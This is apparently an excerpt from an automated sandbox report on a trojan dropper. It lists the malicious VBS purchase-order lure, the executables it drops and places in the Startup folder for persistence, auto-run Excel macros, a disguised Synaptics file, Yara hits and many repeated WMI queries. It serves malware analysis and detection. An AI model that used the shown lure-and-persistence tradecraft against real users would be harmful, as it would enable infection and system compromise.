                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_002AF5D027_2_002AF5D0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0025368027_2_00253680
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027599F27_2_0027599F
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026DA7427_2_0026DA74
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00245D3227_2_00245D32
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026BDF627_2_0026BDF6
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0024BDF027_2_0024BDF0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00261E5A27_2_00261E5A
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0026DF6927_2_0026DF69
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0028BFB827_2_0028BFB8
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_00277FFD27_2_00277FFD
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: JLGkYinr.xlsm.5.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: XZXHAVGRAG.xlsm.5.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: 2iL45kbL.xlsm.29.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Private Sub Workbook_Open()
                            Source: HTAGVDFUIE.xlsm.29.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCX915F.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                            Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXC360.tmp 449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 0025F885 appears 67 times
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: String function: 00267750 appears 42 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 008BF885 appears 67 times
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: String function: 008C7750 appears 42 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 0091F885 appears 67 times
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: String function: 00927750 appears 42 times
                            Source: Open Purchase Order Summary Details-16-12-2024.vbsInitial sample: Strings found which are bigger than 50
                            Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 4768
                            Source: Products-Pdf[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Products-Pdf[1].exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Google.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: Synaptics.exe.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RCXC360.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.5.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RCX915F.tmp.26.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: ~$cache1.29.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: classification engineClassification label: mal100.troj.adwa.expl.evad.winVBS@30/101@19/7
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094D712 GetLastError,FormatMessageW,2_2_0094D712
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093B8B0 AdjustTokenPrivileges,CloseHandle,2_2_0093B8B0
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0093BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_0093BEC3
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008DB8B0 AdjustTokenPrivileges,CloseHandle,11_2_008DB8B0
                            Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 11_2_008DBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_008DBEC3
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027B8B0 AdjustTokenPrivileges,CloseHandle,27_2_0027B8B0
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exeCode function: 27_2_0027BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,27_2_0027BEC3
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094EA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_0094EA85
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_00946F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00946F5B
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_0094EFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_0094EFCD
                            Source: C:\Users\user\AppData\Local\Temp\._cache_Google.exeCode function: 2_2_009031F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_009031F2
                            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exeJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5016
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeFile created: C:\Users\user\AppData\Local\Temp\._cache_Google.exeJump to behavior
                            Source: Yara matchFile source: 1.0.Google.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000003.1726636255.000002319FC25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1724447854.00000231A04BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000000.00000003.1723583214.00000231A0826000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC360.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX915F.tmp, type: DROPPED
                            Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Products-Pdf[1].exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, type: DROPPED
                            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Open Purchase Order Summary Details-16-12-2024.vbs"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
                            Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Google.exe'
